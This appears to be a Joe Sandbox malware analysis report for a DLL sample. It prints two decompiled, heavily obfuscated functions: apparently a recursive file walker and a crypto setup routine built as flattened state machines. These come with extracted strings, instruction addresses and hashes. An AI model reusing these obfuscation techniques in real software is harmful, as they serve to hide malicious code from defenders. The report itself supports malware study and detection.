Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E10004EA1(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				char _v524;
				char _v1044;
				short _v1588;
				short _v1590;
				char _v1592;
				signed int _v1636;
				signed int _v1640;
				intOrPtr _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				void* _t372;
				signed int _t400;
				signed int _t403;
				void* _t404;
				signed int _t407;
				void* _t410;
				void* _t416;
				signed int _t420;
				void* _t423;
				void* _t429;
				void* _t457;
				signed int _t468;
				signed int _t470;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				void* _t480;
				signed int* _t482;

				_push(_a24);
				_t480 = __ecx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t372);
				_v1640 = _v1640 & 0x00000000;
				_t482 =  &(( &_v1800)[8]);
				_v1644 = 0x4bd480;
				_v1780 = 0x9933;
				_t416 = 0x363f5361;
				_v1780 = _v1780 | 0xad73ff37;
				_v1780 = _v1780 ^ 0x960b9a74;
				_v1780 = _v1780 ^ 0x3b786553;
				_v1784 = 0x542f;
				_v1784 = _v1784 + 0xc8ce;
				_v1784 = _v1784 + 0xffffa8c2;
				_t468 = 0x5b;
				_v1784 = _v1784 / _t468;
				_v1784 = _v1784 ^ 0x00004f1f;
				_v1760 = 0xa937;
				_v1760 = _v1760 + 0xc6be;
				_v1760 = _v1760 | 0x9e8a2caa;
				_v1760 = _v1760 + 0xffff9fa2;
				_v1760 = _v1760 ^ 0x9e8b35b0;
				_v1792 = 0xa290;
				_t470 = 0x63;
				_v1792 = _v1792 * 0x38;
				_v1792 = _v1792 + 0xffff655b;
				_v1792 = _v1792 + 0xffff3f9a;
				_v1792 = _v1792 ^ 0x00223804;
				_v1740 = 0x49e2;
				_v1740 = _v1740 >> 8;
				_v1740 = _v1740 | 0xc414d990;
				_v1740 = _v1740 ^ 0xc41493fb;
				_v1800 = 0x74d9;
				_t471 = 0x17;
				_v1800 = _v1800 / _t470;
				_v1800 = _v1800 ^ 0xc291bda4;
				_v1800 = _v1800 + 0xeb6d;
				_v1800 = _v1800 ^ 0xc292eb29;
				_v1720 = 0x4d0b;
				_v1720 = _v1720 << 7;
				_v1720 = _v1720 + 0x277b;
				_v1720 = _v1720 ^ 0x00268d74;
				_v1768 = 0x75cf;
				_v1768 = _v1768 * 0x62;
				_v1768 = _v1768 + 0x1332;
				_v1768 = _v1768 >> 0xd;
				_v1768 = _v1768 ^ 0x00000ed4;
				_v1692 = 0xd85d;
				_v1692 = _v1692 + 0xd2aa;
				_v1692 = _v1692 ^ 0x0001f663;
				_v1788 = 0xbc3e;
				_v1788 = _v1788 | 0x282d42cc;
				_v1788 = _v1788 + 0xffffb4b2;
				_v1788 = _v1788 * 0x25;
				_v1788 = _v1788 ^ 0xce9a942b;
				_v1796 = 0x301;
				_v1796 = _v1796 ^ 0x0ec358c8;
				_v1796 = _v1796 / _t471;
				_v1796 = _v1796 + 0xffff6806;
				_v1796 = _v1796 ^ 0x00a3cb1c;
				_v1656 = 0xf49e;
				_v1656 = _v1656 + 0xffffddef;
				_v1656 = _v1656 ^ 0x0000aa95;
				_v1728 = 0xf403;
				_v1728 = _v1728 + 0x6a8e;
				_v1728 = _v1728 << 6;
				_v1728 = _v1728 ^ 0x0057d552;
				_v1756 = 0x4f4e;
				_v1756 = _v1756 + 0xffff0830;
				_v1756 = _v1756 | 0xfc8d1ff5;
				_v1756 = _v1756 >> 0xb;
				_v1756 = _v1756 ^ 0x001fca39;
				_v1680 = 0x60;
				_v1680 = _v1680 >> 0xd;
				_v1680 = _v1680 ^ 0x00002a5b;
				_v1688 = 0xc18a;
				_v1688 = _v1688 ^ 0xc8271709;
				_v1688 = _v1688 ^ 0xc827be32;
				_v1704 = 0xf8b0;
				_v1704 = _v1704 << 6;
				_v1704 = _v1704 ^ 0x003e063b;
				_v1772 = 0x7a1e;
				_v1772 = _v1772 ^ 0xc6946529;
				_v1772 = _v1772 << 4;
				_v1772 = _v1772 << 2;
				_v1772 = _v1772 ^ 0xa507b562;
				_v1744 = 0xe662;
				_v1744 = _v1744 >> 5;
				_v1744 = _v1744 | 0x81d50607;
				_v1744 = _v1744 ^ 0x81d55403;
				_v1716 = 0x2f94;
				_v1716 = _v1716 / _t468;
				_t472 = 0x2c;
				_v1716 = _v1716 / _t472;
				_v1716 = _v1716 ^ 0x00000a71;
				_v1648 = 0xc69;
				_v1648 = _v1648 + 0x3b27;
				_v1648 = _v1648 ^ 0x00004de4;
				_v1732 = 0x30eb;
				_v1732 = _v1732 | 0x980f1189;
				_t473 = 0x7e;
				_v1732 = _v1732 * 0x3d;
				_v1732 = _v1732 ^ 0x3b9ecce7;
				_v1684 = 0xb64c;
				_v1684 = _v1684 ^ 0x315bc1c3;
				_v1684 = _v1684 ^ 0x315b57c4;
				_v1724 = 0x6411;
				_v1724 = _v1724 | 0xfbcd3fff;
				_v1724 = _v1724 ^ 0xfbcd5420;
				_v1764 = 0xfef7;
				_v1764 = _v1764 >> 0xf;
				_v1764 = _v1764 ^ 0xb299bfc4;
				_v1764 = _v1764 | 0x06f7c44b;
				_v1764 = _v1764 ^ 0xb6ffeafa;
				_v1676 = 0x7f53;
				_v1676 = _v1676 ^ 0x68612cf3;
				_v1676 = _v1676 ^ 0x68615bca;
				_v1736 = 0xced2;
				_v1736 = _v1736 / _t473;
				_t474 = 0x45;
				_v1736 = _v1736 / _t474;
				_v1736 = _v1736 ^ 0x00002bb2;
				_v1748 = 0xc83d;
				_v1748 = _v1748 | 0xac12259f;
				_v1748 = _v1748 + 0xffff4283;
				_v1748 = _v1748 ^ 0xac12199f;
				_v1696 = 0xff80;
				_t475 = 0x51;
				_v1696 = _v1696 / _t475;
				_v1696 = _v1696 ^ 0x0000122c;
				_v1700 = 0x5074;
				_v1700 = _v1700 + 0xffffb5cd;
				_v1700 = _v1700 ^ 0x0000626a;
				_v1668 = 0xce62;
				_t476 = 0x5d;
				_v1668 = _v1668 / _t476;
				_v1668 = _v1668 ^ 0x00006436;
				_v1652 = 0x16bc;
				_v1652 = _v1652 << 3;
				_v1652 = _v1652 ^ 0x0000d776;
				_v1664 = 0x5160;
				_v1664 = _v1664 + 0xffff7d7f;
				_v1664 = _v1664 ^ 0xfffff234;
				_v1776 = 0x2bb0;
				_v1776 = _v1776 ^ 0xda170107;
				_v1776 = _v1776 >> 9;
				_v1776 = _v1776 >> 0xa;
				_v1776 = _v1776 ^ 0x00006842;
				_v1660 = 0xed5a;
				_t477 = 0x4f;
				_v1660 = _v1660 / _t477;
				_v1660 = _v1660 ^ 0x00003872;
				_v1708 = 0x88f4;
				_v1708 = _v1708 + 0x1364;
				_v1708 = _v1708 ^ 0x00009651;
				_v1712 = 0x6359;
				_v1712 = _v1712 ^ 0x0adc469b;
				_t469 = _v1708;
				_v1712 = _v1712 * 0x12;
				_v1712 = _v1712 ^ 0xc37acb18;
				_v1672 = 0x7869;
				_v1672 = _v1672 * 0x31;
				_v1672 = _v1672 ^ 0x001774dc;
				_v1752 = 0x2ad2;
				_v1752 = _v1752 + 0x99c0;
				_v1752 = _v1752 + 0xffff4378;
				_v1752 = _v1752 ^ 0x00000634;
				while(1) {
					_t457 = 0x2e;
					L2:
					while(_t416 != 0x34b2b71) {
						if(_t416 == 0x5071dc9) {
							__eflags = _v1636 & _v1780;
							if(__eflags == 0) {
								_t403 = _a16( &_v1636, _a12);
								asm("sbb ecx, ecx");
								_t420 =  ~_t403 & 0x01e56524;
								L9:
								_t416 = _t420 + 0x36fd2c93;
								while(1) {
									_t457 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v1592 - _t457;
							if(_v1592 != _t457) {
								L18:
								__eflags = _a24;
								if(__eflags != 0) {
									_push(0x100015c0);
									_push(_v1744);
									_t410 = E1001BF25(_v1704, _v1772, __eflags);
									_pop(_t423);
									E100163BF(_t410, __eflags, _v1648, _v1732,  &_v524, _t423, _v1684, _t480,  &_v1592, _v1724);
									E10004EA1( &_v524, _v1764, _v1676, _v1736, _a12, _a16, _v1748, _a24);
									_t407 = E1001C5F7(_v1696, _v1700, _v1668, _v1652, _t410);
									_t482 =  &(_t482[0x11]);
									_t457 = 0x2e;
								}
								L17:
								_t416 = 0x38e291b7;
								continue;
							}
							__eflags = _v1590;
							if(__eflags == 0) {
								goto L17;
							}
							__eflags = _v1590 - _t457;
							if(_v1590 != _t457) {
								goto L18;
							}
							__eflags = _v1588;
							if(__eflags != 0) {
								goto L18;
							}
							goto L17;
						}
						if(_t416 == 0x14043b9b) {
							_push(0x100015b0);
							_push(_v1792);
							_t404 = E1001BF25(_v1784, _v1760, __eflags);
							_pop(_t429);
							E10013D3D(_t404, __eflags, _v1740, _v1800,  &_v1044, _v1720, _t429, _v1768);
							_t407 = E1001C5F7(_v1692, _v1788, _v1796, _v1656, _t404);
							_t482 =  &(_t482[9]);
							_t416 = 0x34b2b71;
							while(1) {
								_t457 = 0x2e;
								goto L2;
							}
						}
						if(_t416 == 0x363f5361) {
							_t416 = 0x14043b9b;
							continue;
						}
						if(_t416 == 0x36fd2c93) {
							return E10001EC9(_v1708, _v1712, _t469, _v1672, _v1752);
						}
						if(_t416 != 0x38e291b7) {
							L24:
							__eflags = _t416 - 0x1d1ded50;
							if(__eflags != 0) {
								continue;
							}
							return _t407;
						}
						_t407 = E1001D0A1(_v1664, _t469, _v1776, _v1660,  &_v1636);
						_t482 =  &(_t482[3]);
						asm("sbb ecx, ecx");
						_t420 =  ~_t407 & 0xce09f136;
						goto L9;
					}
					_t400 = E10002577( &_v1044,  &_v1636, _v1728, _v1756, _v1680, _v1688);
					_t469 = _t400;
					_t482 =  &(_t482[4]);
					__eflags = _t400 - 0xffffffff;
					if(__eflags == 0) {
						_t416 = 0x1d1ded50;
						_t457 = 0x2e;
						goto L24;
					}
					_t416 = 0x5071dc9;
				}
			}

0x10004eaa
0x10004eb1
0x10004eb3
0x10004eba
0x10004ec1
0x10004ec8
0x10004ecf
0x10004ed6
0x10004ed7
0x10004ed8
0x10004edd
0x10004ee5
0x10004ee8
0x10004ef5
0x10004efd
0x10004f02
0x10004f0a
0x10004f12
0x10004f1a
0x10004f22
0x10004f2a
0x10004f38
0x10004f3d
0x10004f43
0x10004f4b
0x10004f53
0x10004f5b
0x10004f63
0x10004f6b
0x10004f73
0x10004f80
0x10004f83
0x10004f87
0x10004f8f
0x10004f97
0x10004f9f
0x10004fa7
0x10004fac
0x10004fb4
0x10004fbc
0x10004fca
0x10004fcb
0x10004fcf
0x10004fd7
0x10004fdf
0x10004fe7
0x10004fef
0x10004ff4
0x10004ffc
0x10005004
0x10005011
0x10005015
0x1000501d
0x10005022
0x1000502a
0x10005032
0x1000503a
0x10005042
0x1000504a
0x10005052
0x1000505f
0x10005063
0x1000506b
0x10005073
0x10005085
0x10005089
0x10005091
0x10005099
0x100050a4
0x100050af
0x100050ba
0x100050c2
0x100050ca
0x100050cf
0x100050d7
0x100050df
0x100050e7
0x100050ef
0x100050f4
0x100050fc
0x10005107
0x1000510f
0x1000511a
0x10005122
0x1000512a
0x10005132
0x1000513a
0x1000513f
0x10005147
0x1000514f
0x10005157
0x1000515c
0x10005161
0x10005169
0x10005171
0x10005176
0x1000517e
0x10005186
0x10005196
0x100051a0
0x100051a5
0x100051ab
0x100051b3
0x100051be
0x100051c9
0x100051d4
0x100051dc
0x100051e9
0x100051ec
0x100051f0
0x100051f8
0x10005203
0x1000520e
0x10005219
0x10005221
0x10005229
0x10005231
0x10005239
0x1000523e
0x10005246
0x1000524e
0x10005256
0x10005261
0x1000526c
0x10005277
0x10005287
0x1000528f
0x10005292
0x10005296
0x100052a0
0x100052a8
0x100052b0
0x100052b8
0x100052c0
0x100052ce
0x100052d3
0x100052d9
0x100052e1
0x100052e9
0x100052f1
0x100052f9
0x1000530b
0x10005310
0x10005319
0x10005324
0x1000532f
0x10005337
0x10005342
0x1000534d
0x10005358
0x10005363
0x1000536b
0x10005373
0x10005378
0x1000537d
0x10005385
0x10005397
0x1000539a
0x100053a1
0x100053ac
0x100053b4
0x100053bc
0x100053c4
0x100053cc
0x100053d9
0x100053dd
0x100053e1
0x100053e9
0x100053fc
0x10005403
0x1000540e
0x10005416
0x1000541e
0x10005426
0x1000542e
0x10005430
0x00000000
0x10005431
0x10005443
0x10005519
0x10005520
0x10005624
0x1000562f
0x10005631
0x100054a1
0x100054a1
0x1000542e
0x10005430
0x00000000
0x10005430
0x1000542e
0x10005526
0x1000552e
0x1000555a
0x1000555a
0x10005562
0x10005564
0x10005569
0x10005575
0x1000557b
0x100055af
0x100055e3
0x10005605
0x1000560a
0x1000560f
0x1000560f
0x10005550
0x10005550
0x00000000
0x10005550
0x10005530
0x10005539
0x00000000
0x00000000
0x1000553b
0x10005543
0x00000000
0x00000000
0x10005545
0x1000554e
0x00000000
0x00000000
0x00000000
0x1000554e
0x1000544f
0x100054b0
0x100054b5
0x100054c1
0x100054c7
0x100054e7
0x10005503
0x10005508
0x1000550b
0x1000542e
0x10005430
0x00000000
0x10005430
0x1000542e
0x10005457
0x100054a9
0x00000000
0x100054a9
0x1000545f
0x00000000
0x100056a5
0x1000546b
0x1000567e
0x1000567e
0x10005684
0x00000000
0x00000000
0x00000000
0x10005684
0x1000548d
0x10005492
0x10005499
0x1000549b
0x00000000
0x1000549b
0x1000565d
0x10005662
0x10005664
0x10005667
0x1000566a
0x10005678
0x1000567d
0x00000000
0x1000567d
0x1000566c
0x1000566c

Strings

jb, xrefs: 100052F1
/T, xrefs: 10004F1A
Z, xrefs: 10005385
ix, xrefs: 100053E9
Sex;, xrefs: 10004F12
Bh, xrefs: 1000537D
6d, xrefs: 10005319
m, xrefs: 10004FD7
r8, xrefs: 100053A1
[*, xrefs: 1000510F
M, xrefs: 100051C9
aS?6, xrefs: 10004EFD
b, xrefs: 10005169
aS?6, xrefs: 10005451
I, xrefs: 10004F9F
{', xrefs: 10004FF4
Yc, xrefs: 100053C4
0, xrefs: 100051D4
NO, xrefs: 100050D7

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: /T$6d$Bh$NO$Sex;$Yc$Z$[*$aS?6$aS?6$b$ix$jb$m$r8${'$0$I$M
API String ID: 0-4291825950
Opcode ID: 9b65fe41b74495a2a11ebe89abe6a38f0661331196ce63fca6bce6fffc707089
Instruction ID: 8667d57ab57f633c3b350f9276bfc3316d3d5256110005b5da9373a31fbac2ab
Opcode Fuzzy Hash: 9b65fe41b74495a2a11ebe89abe6a38f0661331196ce63fca6bce6fffc707089
Instruction Fuzzy Hash: 7712137150C7819FE364CF21C849A9FBBE2FBC4398F10891DE19A862A0D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001E19F, Relevance: 21.7, Strings: 17, Instructions: 470
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E1001E19F(void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				unsigned int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				void* __ecx;
				void* _t451;
				void* _t486;
				signed int _t488;
				intOrPtr _t496;
				void* _t501;
				signed int _t511;
				signed int _t515;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				void* _t535;
				intOrPtr _t573;
				void* _t575;
				signed int* _t587;
				void* _t590;

				_t516 = _a8;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E100056B2(_t451);
				_v16 = 0x624f91;
				_t587 =  &(( &_v220)[4]);
				_v12 = 0x2a04c0;
				_v8 = 0x512f64;
				_t573 = 0;
				_v4 = 0;
				_t575 = 0x21d5185e;
				_v216 = 0xc140;
				_t518 = 0xe;
				_v216 = _v216 / _t518;
				_v216 = _v216 | 0xdbfffb91;
				_v216 = _v216 ^ 0xdbff99d3;
				_v168 = 0x2a5e;
				_v168 = _v168 ^ 0xa3c44280;
				_v168 = _v168 << 9;
				_t519 = 0x26;
				_v168 = _v168 / _t519;
				_v168 = _v168 ^ 0x03993ad3;
				_v192 = 0x18c2;
				_v192 = _v192 ^ 0xd0e63b27;
				_v192 = _v192 ^ 0xef30ec67;
				_t36 =  &_v192; // 0xef30ec67
				_t520 = 0x16;
				_v192 =  *_t36 / _t520;
				_v192 = _v192 ^ 0x02e65ae3;
				_v28 = 0x8b75;
				_t521 = 0x66;
				_v28 = _v28 / _t521;
				_v28 = _v28 ^ 0x0000015f;
				_v116 = 0x1a67;
				_v116 = _v116 ^ 0x4b480ab8;
				_v116 = _v116 + 0xffffe6d8;
				_v116 = _v116 ^ 0x4b47f7f7;
				_v164 = 0xf9a1;
				_v164 = _v164 + 0xce44;
				_t522 = 0x15;
				_v164 = _v164 / _t522;
				_v164 = _v164 * 0x64;
				_v164 = _v164 ^ 0xf0087ab4;
				_v104 = 0x8783;
				_v104 = _v104 >> 9;
				_v104 = _v104 << 7;
				_v104 = _v104 ^ 0x000005ac;
				_v68 = 0xc586;
				_v68 = _v68 * 0x2a;
				_v68 = _v68 ^ 0x00202599;
				_v40 = 0xd110;
				_v40 = _v40 | 0x671d2d67;
				_v40 = _v40 ^ 0x671d8efb;
				_v100 = 0x326d;
				_v100 = _v100 ^ 0xf0f4e5fa;
				_v100 = _v100 << 6;
				_v100 = _v100 ^ 0x3d35bfd9;
				_v48 = 0x7d57;
				_t523 = 0x63;
				_v48 = _v48 * 0x6e;
				_v48 = _v48 ^ 0x0035e190;
				_v156 = 0xbe8d;
				_v156 = _v156 | 0xda6f2624;
				_v156 = _v156 + 0xdae9;
				_v156 = _v156 | 0xe9accc97;
				_v156 = _v156 ^ 0xfbfc818b;
				_v108 = 0xbce1;
				_v108 = _v108 ^ 0x7ee51402;
				_v108 = _v108 + 0xffff7bea;
				_v108 = _v108 ^ 0x7ee5758f;
				_v56 = 0x8521;
				_v56 = _v56 ^ 0x357a7630;
				_v56 = _v56 ^ 0x357a8a2f;
				_v124 = 0x158;
				_v124 = _v124 + 0xffffb1a8;
				_v124 = _v124 | 0x92d6cfda;
				_v124 = _v124 ^ 0xffffc67a;
				_v172 = 0xab3b;
				_v172 = _v172 | 0xe0b1ec5b;
				_v172 = _v172 ^ 0xbad91e0a;
				_v172 = _v172 + 0xa707;
				_v172 = _v172 ^ 0x5a69f167;
				_v96 = 0xed9e;
				_v96 = _v96 + 0x6931;
				_v96 = _v96 ^ 0x00013b1d;
				_v208 = 0xc215;
				_v208 = _v208 + 0xb2e7;
				_v208 = _v208 ^ 0x39f9ff48;
				_v208 = _v208 + 0x9ab9;
				_v208 = _v208 ^ 0x39f93b82;
				_v112 = 0x3498;
				_v112 = _v112 + 0x4bc6;
				_v112 = _v112 / _t523;
				_v112 = _v112 ^ 0x00004366;
				_v220 = 0x48;
				_v220 = _v220 | 0xadbd3685;
				_t524 = 0x25;
				_v220 = _v220 / _t524;
				_v220 = _v220 + 0xbcbb;
				_v220 = _v220 ^ 0x04b294b8;
				_v160 = 0x4d28;
				_v160 = _v160 >> 3;
				_t525 = 0x58;
				_v160 = _v160 * 0xb;
				_v160 = _v160 / _t525;
				_v160 = _v160 ^ 0x00006f26;
				_v60 = 0xbd2;
				_v60 = _v60 + 0xffff7eef;
				_v60 = _v60 ^ 0xffffcc99;
				_v32 = 0x1812;
				_v32 = _v32 + 0xffff0573;
				_v32 = _v32 ^ 0xffff5502;
				_v132 = 0x7f72;
				_t526 = 0x75;
				_v132 = _v132 / _t526;
				_v132 = _v132 + 0xb09c;
				_v132 = _v132 ^ 0x000095d1;
				_v188 = 0x9149;
				_v188 = _v188 | 0xa4dde4e7;
				_v188 = _v188 + 0x1385;
				_v188 = _v188 << 0xe;
				_v188 = _v188 ^ 0x825d3d05;
				_v152 = 0x592e;
				_t527 = 0x28;
				_v152 = _v152 * 0x2c;
				_v152 = _v152 ^ 0x9c2a3110;
				_v152 = _v152 ^ 0x9c255458;
				_v196 = 0x1135;
				_v196 = _v196 + 0xfffff425;
				_v196 = _v196 >> 6;
				_v196 = _v196 ^ 0xbfbf1d5b;
				_v196 = _v196 ^ 0xbfbf60c8;
				_v204 = 0xcc36;
				_v204 = _v204 * 0xe;
				_v204 = _v204 >> 1;
				_v204 = _v204 << 0xa;
				_v204 = _v204 ^ 0x1655baac;
				_v212 = 0xe9d4;
				_v212 = _v212 + 0xffff7206;
				_v212 = _v212 + 0x7a90;
				_v212 = _v212 ^ 0x86b4db23;
				_v212 = _v212 ^ 0x86b43879;
				_v180 = 0xccf3;
				_v180 = _v180 ^ 0xb9c8351b;
				_v180 = _v180 | 0x98038e8f;
				_v180 = _v180 * 0x49;
				_v180 = _v180 ^ 0xfb2bf902;
				_v64 = 0x9efe;
				_v64 = _v64 + 0xfffffaef;
				_v64 = _v64 ^ 0x0000b4c9;
				_v72 = 0xd172;
				_v72 = _v72 | 0x8d5131d7;
				_v72 = _v72 ^ 0x8d51ace7;
				_v120 = 0x59d5;
				_v120 = _v120 + 0xffffff6e;
				_v120 = _v120 >> 6;
				_v120 = _v120 ^ 0x00005703;
				_v84 = 0xde85;
				_v84 = _v84 ^ 0x89f562d5;
				_v84 = _v84 ^ 0x89f58b7f;
				_v52 = 0x311b;
				_v52 = _v52 << 1;
				_v52 = _v52 ^ 0x00002d97;
				_v184 = 0xdffe;
				_v184 = _v184 ^ 0xc31def80;
				_v184 = _v184 << 1;
				_v184 = _v184 * 0xe;
				_v184 = _v184 ^ 0x573173b9;
				_v144 = 0x2421;
				_v144 = _v144 * 0x7e;
				_v144 = _v144 + 0xffffbdf8;
				_v144 = _v144 ^ 0x0011d9fd;
				_v140 = 0xb5be;
				_v140 = _v140 + 0xffff1138;
				_v140 = _v140 ^ 0xaa88dcf7;
				_v140 = _v140 ^ 0x55773d43;
				_v44 = 0x6427;
				_v44 = _v44 ^ 0x73b6b443;
				_v44 = _v44 ^ 0x73b6c2cf;
				_v76 = 0xab83;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 ^ 0x00003dd9;
				_v176 = 0xa297;
				_v176 = _v176 + 0x40d1;
				_v176 = _v176 / _t527;
				_v176 = _v176 >> 0xb;
				_v176 = _v176 ^ 0x0000189d;
				_v136 = 0x856e;
				_v136 = _v136 << 0xf;
				_v136 = _v136 >> 0x10;
				_v136 = _v136 ^ 0x00004166;
				_v200 = 0x9381;
				_v200 = _v200 << 5;
				_v200 = _v200 + 0xcf90;
				_t528 = 0x3c;
				_v200 = _v200 / _t528;
				_v200 = _v200 ^ 0x000016ff;
				_v80 = 0x8f73;
				_v80 = _v80 + 0xffffab60;
				_v80 = _v80 ^ 0x00004f6d;
				_v88 = 0xa0c7;
				_v88 = _v88 ^ 0xf6585f6c;
				_v88 = _v88 ^ 0xf658d2ca;
				_v148 = 0x53c;
				_v148 = _v148 << 9;
				_v148 = _v148 << 0x10;
				_v148 = _v148 ^ 0x7800710d;
				_v36 = 0x1d9;
				_v36 = _v36 + 0x3c9e;
				_v36 = _v36 ^ 0x00013e77;
				_v92 = 0x5eee;
				_v92 = _v92 + 0xffffe50b;
				_v92 = _v92 ^ 0x000043ea;
				_v128 = 0xff6;
				_v128 = _v128 >> 0xd;
				_v128 = _v128 >> 6;
				_v128 = _v128 ^ 0x00000001;
				goto L1;
				do {
					while(1) {
						L1:
						_t590 = _t575 - 0x21d5185e;
						if(_t590 > 0) {
							break;
						}
						if(_t590 == 0) {
							_t535 = 0x2c;
							_t496 = E100157E8(_t535);
							 *0x100221b4 = _t496;
							_t528 = _t528;
							if(_t496 != 0) {
								_t575 = 0x235d3418;
								continue;
							}
						} else {
							if(_t575 == 0x1d010d0) {
								_t528 = _v44;
								_t501 = E10008F73(_t528, _v76,  *((intOrPtr*)( *0x100221b4 + 4)), _t528, _v176, _v136, _t528, _v200, _v168,  *0x100221b4 + 0x10);
								_t587 =  &(_t587[8]);
								if(_t501 != 0) {
									_t573 = 1;
								} else {
									_t575 = 0x2ad17601;
									continue;
								}
							} else {
								if(_t575 == 0x2a7485f) {
									_push(_t528);
									E10008A8C( *((intOrPtr*)( *0x100221b4 + 4)));
									_t528 = _t528;
									_t575 = 0xea2ab84;
									continue;
								} else {
									if(_t575 == 0x6da30e1) {
										_push(_t528);
										E1000AC80( *((intOrPtr*)( *0x100221b4 + 0x14)));
										_t528 = _t528;
										_t575 = 0x2a7485f;
										continue;
									} else {
										if(_t575 == 0xea2ab84) {
											E100091CD(_v40, _v100, _v48,  *0x100221b4, _v156);
										} else {
											if(_t575 != 0x16122494) {
												goto L25;
											} else {
												_push(_t528);
												_t528 = _v184;
												_t511 = E1000AB96(_t528, _v144, _v216, _v140, _v28,  *((intOrPtr*)( *0x100221b4 + 4)));
												_t587 =  &(_t587[5]);
												asm("sbb esi, esi");
												_t575 = ( ~_t511 & 0xfaf5dfef) + 0x6da30e1;
												continue;
											}
										}
									}
								}
							}
						}
						L29:
						return _t573;
					}
					if(_t575 == 0x235d3418) {
						_push(_t528);
						_t528 = _v164 | _v116;
						_t486 = E10003BCD(_t528, _v108, _v56, _v124, _t528, _v172, _t528,  *0x100221b4 + 4);
						_t587 =  &(_t587[7]);
						if(_t486 == 0) {
							_t575 = 0xea2ab84;
							goto L25;
						} else {
							_t575 = 0x2b13f55e;
							goto L1;
						}
					} else {
						if(_t575 == 0x261556b7) {
							_t488 = E10007A59(_v132, _v188, _v24,  *0x100221b4, _v20,  *((intOrPtr*)( *0x100221b4 + 4)),  *0x100221b4 + 0x14, _v152, _v196, _t528, _v204, _v212);
							_t528 = _v180;
							asm("sbb esi, esi");
							_t575 = ( ~_t488 & 0x136adc35) + 0x2a7485f;
							E10007BE0(_t528, _v24, _v64, _v72);
							_t587 =  &(_t587[0xc]);
							goto L25;
						} else {
							if(_t575 == 0x2ad17601) {
								_push(_t528);
								E1000AC80( *((intOrPtr*)( *0x100221b4)));
								_t528 = _t528;
								_t575 = 0x6da30e1;
								goto L1;
							} else {
								if(_t575 != 0x2b13f55e) {
									goto L25;
								} else {
									_push(_t528);
									_t528 =  &_v20;
									_t515 = E1000CC2A(_t528, _v92,  *_t516, _v112, _v220, _v160, _v128 | _v36,  &_v24, _v60,  *((intOrPtr*)(_t516 + 4)), _v32, _v192);
									_t587 =  &(_t587[0xb]);
									asm("sbb esi, esi");
									_t575 = ( ~_t515 & 0x236e0e58) + 0x2a7485f;
									goto L1;
								}
							}
						}
					}
					goto L29;
					L25:
				} while (_t575 != 0x1e355eb8);
				goto L29;
			}

0x1001e1a6
0x1001e1b0
0x1001e1b1
0x1001e1b8
0x1001e1ba
0x1001e1bf
0x1001e1ca
0x1001e1cd
0x1001e1da
0x1001e1e5
0x1001e1e7
0x1001e1ee
0x1001e1f3
0x1001e201
0x1001e206
0x1001e20c
0x1001e214
0x1001e21c
0x1001e224
0x1001e22c
0x1001e235
0x1001e23a
0x1001e240
0x1001e248
0x1001e250
0x1001e258
0x1001e260
0x1001e264
0x1001e269
0x1001e26f
0x1001e277
0x1001e289
0x1001e28e
0x1001e297
0x1001e2a2
0x1001e2aa
0x1001e2b2
0x1001e2ba
0x1001e2c2
0x1001e2ca
0x1001e2d6
0x1001e2d9
0x1001e2e2
0x1001e2e6
0x1001e2ee
0x1001e2f9
0x1001e301
0x1001e309
0x1001e314
0x1001e327
0x1001e32e
0x1001e339
0x1001e344
0x1001e34f
0x1001e35a
0x1001e365
0x1001e372
0x1001e37a
0x1001e385
0x1001e39a
0x1001e39d
0x1001e3a4
0x1001e3af
0x1001e3b7
0x1001e3bf
0x1001e3c7
